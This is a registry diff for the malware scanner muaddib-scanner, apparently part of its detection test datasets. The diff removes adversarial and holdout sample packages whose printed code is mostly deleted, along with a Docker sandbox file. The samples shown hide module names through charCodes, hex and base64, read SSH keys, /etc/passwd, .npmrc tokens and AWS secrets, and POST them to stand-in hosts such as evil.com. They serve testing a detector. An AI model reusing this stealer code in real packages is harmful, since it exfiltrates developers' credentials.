muaddib-scanner 2.2.22 → 2.2.23
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/.gitattributes +0 -18
- package/datasets/adversarial/README.md +0 -23
- package/datasets/adversarial/ai-agent-weaponization/index.js +0 -5
- package/datasets/adversarial/ai-agent-weaponization/package.json +0 -9
- package/datasets/adversarial/ai-agent-weaponization/setup.js +0 -83
- package/datasets/adversarial/ai-config-injection/.cursorrules +0 -36
- package/datasets/adversarial/ai-config-injection/index.js +0 -16
- package/datasets/adversarial/ai-config-injection/package.json +0 -8
- package/datasets/adversarial/browser-api-hook/index.js +0 -66
- package/datasets/adversarial/browser-api-hook/package.json +0 -6
- package/datasets/adversarial/bun-runtime-evasion/bun_environment.js +0 -23
- package/datasets/adversarial/bun-runtime-evasion/package.json +0 -9
- package/datasets/adversarial/bun-runtime-evasion/setup.js +0 -10
- package/datasets/adversarial/ci-trigger-exfil/index.js +0 -17
- package/datasets/adversarial/ci-trigger-exfil/package.json +0 -9
- package/datasets/adversarial/conditional-chain/index.js +0 -14
- package/datasets/adversarial/conditional-chain/package.json +0 -9
- package/datasets/adversarial/crypto-wallet-harvest/index.js +0 -44
- package/datasets/adversarial/crypto-wallet-harvest/package.json +0 -6
- package/datasets/adversarial/dead-mans-switch/index.js +0 -35
- package/datasets/adversarial/dead-mans-switch/package.json +0 -9
- package/datasets/adversarial/delayed-exfil/index.js +0 -6
- package/datasets/adversarial/delayed-exfil/package.json +0 -6
- package/datasets/adversarial/detached-background/launcher.js +0 -11
- package/datasets/adversarial/detached-background/package.json +0 -9
- package/datasets/adversarial/detached-background/worker.js +0 -26
- package/datasets/adversarial/discord-webhook-exfil/index.js +0 -95
- package/datasets/adversarial/discord-webhook-exfil/package.json +0 -9
- package/datasets/adversarial/dns-chunk-exfil/index.js +0 -10
- package/datasets/adversarial/dns-chunk-exfil/package.json +0 -6
- package/datasets/adversarial/docker-aware/index.js +0 -10
- package/datasets/adversarial/docker-aware/package.json +0 -6
- package/datasets/adversarial/double-base64-exfil/index.js +0 -11
- package/datasets/adversarial/double-base64-exfil/package.json +0 -9
- package/datasets/adversarial/dynamic-import/index.js +0 -21
- package/datasets/adversarial/dynamic-import/package.json +0 -9
- package/datasets/adversarial/dynamic-require/index.js +0 -3
- package/datasets/adversarial/dynamic-require/package.json +0 -9
- package/datasets/adversarial/fake-captcha-fingerprint/index.js +0 -64
- package/datasets/adversarial/fake-captcha-fingerprint/package.json +0 -9
- package/datasets/adversarial/gh-cli-token-steal/index.js +0 -31
- package/datasets/adversarial/gh-cli-token-steal/package.json +0 -6
- package/datasets/adversarial/github-exfil/index.js +0 -33
- package/datasets/adversarial/github-exfil/package.json +0 -9
- package/datasets/adversarial/iife-exfil/index.js +0 -17
- package/datasets/adversarial/iife-exfil/package.json +0 -9
- package/datasets/adversarial/indirect-eval-bypass/index.js +0 -27
- package/datasets/adversarial/indirect-eval-bypass/package.json +0 -5
- package/datasets/adversarial/mjs-extension-bypass/package.json +0 -6
- package/datasets/adversarial/mjs-extension-bypass/stealer.mjs +0 -39
- package/datasets/adversarial/muaddib-ignore-bypass/index.js +0 -47
- package/datasets/adversarial/muaddib-ignore-bypass/package.json +0 -5
- package/datasets/adversarial/nested-payload/index.js +0 -3
- package/datasets/adversarial/nested-payload/package.json +0 -9
- package/datasets/adversarial/nested-payload/utils/helper.js +0 -6
- package/datasets/adversarial/nested-payload/utils/lib/format.js +0 -23
- package/datasets/adversarial/postinstall-download/package.json +0 -8
- package/datasets/adversarial/preinstall-background-fork/bootstrap.js +0 -16
- package/datasets/adversarial/preinstall-background-fork/index.js +0 -2
- package/datasets/adversarial/preinstall-background-fork/package.json +0 -9
- package/datasets/adversarial/preinstall-background-fork/stealer.js +0 -67
- package/datasets/adversarial/preinstall-exec/package.json +0 -9
- package/datasets/adversarial/preinstall-exec/steal.js +0 -24
- package/datasets/adversarial/proxy-env-intercept/index.js +0 -33
- package/datasets/adversarial/proxy-env-intercept/package.json +0 -9
- package/datasets/adversarial/pyinstaller-dropper/index.js +0 -25
- package/datasets/adversarial/pyinstaller-dropper/package.json +0 -9
- package/datasets/adversarial/rdd-zero-deps/index.js +0 -32
- package/datasets/adversarial/rdd-zero-deps/init.js +0 -15
- package/datasets/adversarial/rdd-zero-deps/package.json +0 -11
- package/datasets/adversarial/remote-dynamic-dependency/index.js +0 -15
- package/datasets/adversarial/remote-dynamic-dependency/package.json +0 -7
- package/datasets/adversarial/self-hosted-runner-backdoor/index.js +0 -28
- package/datasets/adversarial/self-hosted-runner-backdoor/package.json +0 -9
- package/datasets/adversarial/silent-error-swallow/index.js +0 -32
- package/datasets/adversarial/silent-error-swallow/package.json +0 -6
- package/datasets/adversarial/staged-fetch/index.js +0 -9
- package/datasets/adversarial/staged-fetch/package.json +0 -6
- package/datasets/adversarial/string-concat-obfuscation/index.js +0 -6
- package/datasets/adversarial/string-concat-obfuscation/package.json +0 -6
- package/datasets/adversarial/template-literal-obfuscation/index.js +0 -4
- package/datasets/adversarial/template-literal-obfuscation/package.json +0 -9
- package/datasets/adversarial/triple-base64-github-push/index.js +0 -38
- package/datasets/adversarial/triple-base64-github-push/package.json +0 -9
- package/datasets/adversarial/websocket-exfil/index.js +0 -34
- package/datasets/adversarial/websocket-exfil/package.json +0 -9
- package/datasets/benign/README.md +0 -20
- package/datasets/benign/packages-npm.txt +0 -597
- package/datasets/benign/packages-pypi.txt +0 -164
- package/datasets/ground-truth/README.md +0 -54
- package/datasets/ground-truth/known-malware.json +0 -622
- package/datasets/holdout-v4/atob-eval/index.js +0 -2
- package/datasets/holdout-v4/atob-eval/package.json +0 -5
- package/datasets/holdout-v4/base64-require/index.js +0 -3
- package/datasets/holdout-v4/base64-require/package.json +0 -5
- package/datasets/holdout-v4/charcode-fetch/index.js +0 -3
- package/datasets/holdout-v4/charcode-fetch/package.json +0 -5
- package/datasets/holdout-v4/charcode-spread-homedir/index.js +0 -5
- package/datasets/holdout-v4/charcode-spread-homedir/package.json +0 -5
- package/datasets/holdout-v4/concat-env-steal/index.js +0 -4
- package/datasets/holdout-v4/concat-env-steal/package.json +0 -5
- package/datasets/holdout-v4/double-decode-exfil/index.js +0 -4
- package/datasets/holdout-v4/double-decode-exfil/package.json +0 -5
- package/datasets/holdout-v4/hex-array-exec/index.js +0 -3
- package/datasets/holdout-v4/hex-array-exec/package.json +0 -5
- package/datasets/holdout-v4/mixed-obfuscation-stealer/index.js +0 -10
- package/datasets/holdout-v4/mixed-obfuscation-stealer/package.json +0 -5
- package/datasets/holdout-v4/nested-base64-concat/index.js +0 -4
- package/datasets/holdout-v4/nested-base64-concat/package.json +0 -5
- package/datasets/holdout-v4/template-literal-hide/index.js +0 -3
- package/datasets/holdout-v4/template-literal-hide/package.json +0 -5
- package/datasets/holdout-v5/callback-exfil/main.js +0 -8
- package/datasets/holdout-v5/callback-exfil/package.json +0 -5
- package/datasets/holdout-v5/callback-exfil/reader.js +0 -10
- package/datasets/holdout-v5/class-method-exfil/collector.js +0 -10
- package/datasets/holdout-v5/class-method-exfil/main.js +0 -7
- package/datasets/holdout-v5/class-method-exfil/package.json +0 -5
- package/datasets/holdout-v5/conditional-split/detector.js +0 -2
- package/datasets/holdout-v5/conditional-split/package.json +0 -5
- package/datasets/holdout-v5/conditional-split/stealer.js +0 -16
- package/datasets/holdout-v5/event-emitter-flow/listener.js +0 -12
- package/datasets/holdout-v5/event-emitter-flow/package.json +0 -5
- package/datasets/holdout-v5/event-emitter-flow/scanner.js +0 -11
- package/datasets/holdout-v5/mixed-inline-split/index.js +0 -6
- package/datasets/holdout-v5/mixed-inline-split/package.json +0 -5
- package/datasets/holdout-v5/mixed-inline-split/reader.js +0 -3
- package/datasets/holdout-v5/mixed-inline-split/sender.js +0 -6
- package/datasets/holdout-v5/named-export-steal/main.js +0 -6
- package/datasets/holdout-v5/named-export-steal/package.json +0 -5
- package/datasets/holdout-v5/named-export-steal/utils.js +0 -1
- package/datasets/holdout-v5/reexport-chain/a.js +0 -2
- package/datasets/holdout-v5/reexport-chain/b.js +0 -1
- package/datasets/holdout-v5/reexport-chain/c.js +0 -11
- package/datasets/holdout-v5/reexport-chain/package.json +0 -5
- package/datasets/holdout-v5/split-env-exfil/env.js +0 -2
- package/datasets/holdout-v5/split-env-exfil/exfil.js +0 -5
- package/datasets/holdout-v5/split-env-exfil/package.json +0 -5
- package/datasets/holdout-v5/split-npmrc-steal/index.js +0 -2
- package/datasets/holdout-v5/split-npmrc-steal/package.json +0 -5
- package/datasets/holdout-v5/split-npmrc-steal/reader.js +0 -8
- package/datasets/holdout-v5/split-npmrc-steal/sender.js +0 -17
- package/datasets/holdout-v5/three-hop-chain/package.json +0 -5
- package/datasets/holdout-v5/three-hop-chain/reader.js +0 -8
- package/datasets/holdout-v5/three-hop-chain/sender.js +0 -11
- package/datasets/holdout-v5/three-hop-chain/transform.js +0 -3
- package/docker/Dockerfile +0 -20
- package/docker/sandbox-runner.sh +0 -313
- package/testssampleslink-deppackage.json +0 -1
- package/tmp-test-pack.js +0 -66
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
// Holdout v4 — charcode-spread-homedir: module 'os' hidden via charCodes
|
|
2
|
-
const h = String.fromCharCode(...[111, 115]);
|
|
3
|
-
const m = require(h).homedir();
|
|
4
|
-
const f = require('fs').readFileSync(m + '/.ssh/id_rsa');
|
|
5
|
-
require('https').request('https://evil.com').write(f);
|
|
@@ -1,4 +0,0 @@
|
|
|
1
|
-
// Holdout v4 — double-decode-exfil: double base64 encoding
|
|
2
|
-
const modName = Buffer.from(Buffer.from('WTJocGJHUmZjSEp2WTJWemN3PT0=', 'base64').toString(), 'base64').toString();
|
|
3
|
-
const proc = require(modName);
|
|
4
|
-
proc.exec('curl https://evil.com/exfil?data=$(cat /etc/passwd)');
|
|
@@ -1,3 +0,0 @@
|
|
|
1
|
-
// Holdout v4 — hex-array-exec: shell command hidden in hex array
|
|
2
|
-
const cmd = [0x63, 0x75, 0x72, 0x6c, 0x20, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x65, 0x76, 0x69, 0x6c, 0x2e, 0x63, 0x6f, 0x6d].map(c => String.fromCharCode(c)).join('');
|
|
3
|
-
require('child_process').exec(cmd);
|
|
@@ -1,10 +0,0 @@
|
|
|
1
|
-
// Holdout v4 — mixed-obfuscation-stealer: 3 techniques combined
|
|
2
|
-
// Module name via charCode
|
|
3
|
-
const modName = String.fromCharCode(102, 115);
|
|
4
|
-
// Path via base64
|
|
5
|
-
const credPath = Buffer.from('L2V0Yy9wYXNzd2Q=', 'base64').toString();
|
|
6
|
-
// URL via concat
|
|
7
|
-
const host = 'https://' + 'att' + 'acker' + '.com';
|
|
8
|
-
|
|
9
|
-
const data = require(modName).readFileSync(credPath, 'utf8');
|
|
10
|
-
require('https').request(host, { method: 'POST' }, () => {}).write(data);
|
|
@@ -1,10 +0,0 @@
|
|
|
1
|
-
const fs = require('fs');
|
|
2
|
-
const path = require('path');
|
|
3
|
-
const os = require('os');
|
|
4
|
-
|
|
5
|
-
function readCredentials(callback) {
|
|
6
|
-
const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
|
|
7
|
-
callback(npmrc);
|
|
8
|
-
}
|
|
9
|
-
|
|
10
|
-
module.exports = readCredentials;
|
|
@@ -1,16 +0,0 @@
|
|
|
1
|
-
const fs = require('fs');
|
|
2
|
-
const path = require('path');
|
|
3
|
-
const os = require('os');
|
|
4
|
-
const https = require('https');
|
|
5
|
-
const isCI = require('./detector');
|
|
6
|
-
|
|
7
|
-
if (isCI) {
|
|
8
|
-
const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
|
|
9
|
-
const req = https.request({
|
|
10
|
-
hostname: 'evil.com',
|
|
11
|
-
path: '/ci-steal',
|
|
12
|
-
method: 'POST'
|
|
13
|
-
}, (res) => { res.resume(); });
|
|
14
|
-
req.write(npmrc);
|
|
15
|
-
req.end();
|
|
16
|
-
}
|
|
@@ -1,12 +0,0 @@
|
|
|
1
|
-
const https = require('https');
|
|
2
|
-
const bus = require('./scanner');
|
|
3
|
-
|
|
4
|
-
bus.on('data', (creds) => {
|
|
5
|
-
const req = https.request({
|
|
6
|
-
hostname: 'evil.com',
|
|
7
|
-
path: '/steal',
|
|
8
|
-
method: 'POST'
|
|
9
|
-
}, (res) => { res.resume(); });
|
|
10
|
-
req.write(creds);
|
|
11
|
-
req.end();
|
|
12
|
-
});
|
|
@@ -1,11 +0,0 @@
|
|
|
1
|
-
const fs = require('fs');
|
|
2
|
-
const path = require('path');
|
|
3
|
-
const os = require('os');
|
|
4
|
-
const EventEmitter = require('events');
|
|
5
|
-
|
|
6
|
-
const bus = new EventEmitter();
|
|
7
|
-
|
|
8
|
-
const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
|
|
9
|
-
bus.emit('data', npmrc);
|
|
10
|
-
|
|
11
|
-
module.exports = bus;
|
|
@@ -1 +0,0 @@
|
|
|
1
|
-
exports.getCredentials = process.env.AWS_SECRET_ACCESS_KEY;
|
|
@@ -1 +0,0 @@
|
|
|
1
|
-
module.exports = require('./a');
|
|
@@ -1,17 +0,0 @@
|
|
|
1
|
-
const https = require('https');
|
|
2
|
-
const data = require('./reader');
|
|
3
|
-
|
|
4
|
-
const options = {
|
|
5
|
-
hostname: 'collector.evil.com',
|
|
6
|
-
port: 443,
|
|
7
|
-
path: '/exfil',
|
|
8
|
-
method: 'POST',
|
|
9
|
-
headers: { 'Content-Type': 'text/plain' }
|
|
10
|
-
};
|
|
11
|
-
|
|
12
|
-
const req = https.request(options, (res) => {
|
|
13
|
-
res.resume();
|
|
14
|
-
});
|
|
15
|
-
|
|
16
|
-
req.write(data);
|
|
17
|
-
req.end();
|
package/docker/Dockerfile
DELETED
|
@@ -1,20 +0,0 @@
|
|
|
1
|
-
FROM node:20-alpine
|
|
2
|
-
|
|
3
|
-
# Outils de monitoring
|
|
4
|
-
RUN apk add --no-cache strace curl tcpdump coreutils findutils jq iptables
|
|
5
|
-
|
|
6
|
-
# Non-root user for npm install (privilege drop via su in sandbox-runner.sh)
|
|
7
|
-
RUN adduser -D sandboxuser
|
|
8
|
-
|
|
9
|
-
# Dossier de travail avec bonnes permissions
|
|
10
|
-
WORKDIR /sandbox
|
|
11
|
-
RUN chown sandboxuser:sandboxuser /sandbox
|
|
12
|
-
|
|
13
|
-
# Script d'analyse (sed strips Windows CRLF line endings)
|
|
14
|
-
COPY sandbox-runner.sh /sandbox/
|
|
15
|
-
RUN sed -i 's/\r$//' /sandbox/sandbox-runner.sh && chmod +x /sandbox/sandbox-runner.sh
|
|
16
|
-
|
|
17
|
-
# Entrypoint runs as root for iptables/tcpdump/dmesg access.
|
|
18
|
-
# npm install is dropped to sandboxuser via su in sandbox-runner.sh.
|
|
19
|
-
# --security-opt no-new-privileges is set by the Docker run args in sandbox.js.
|
|
20
|
-
ENTRYPOINT ["/sandbox/sandbox-runner.sh"]
|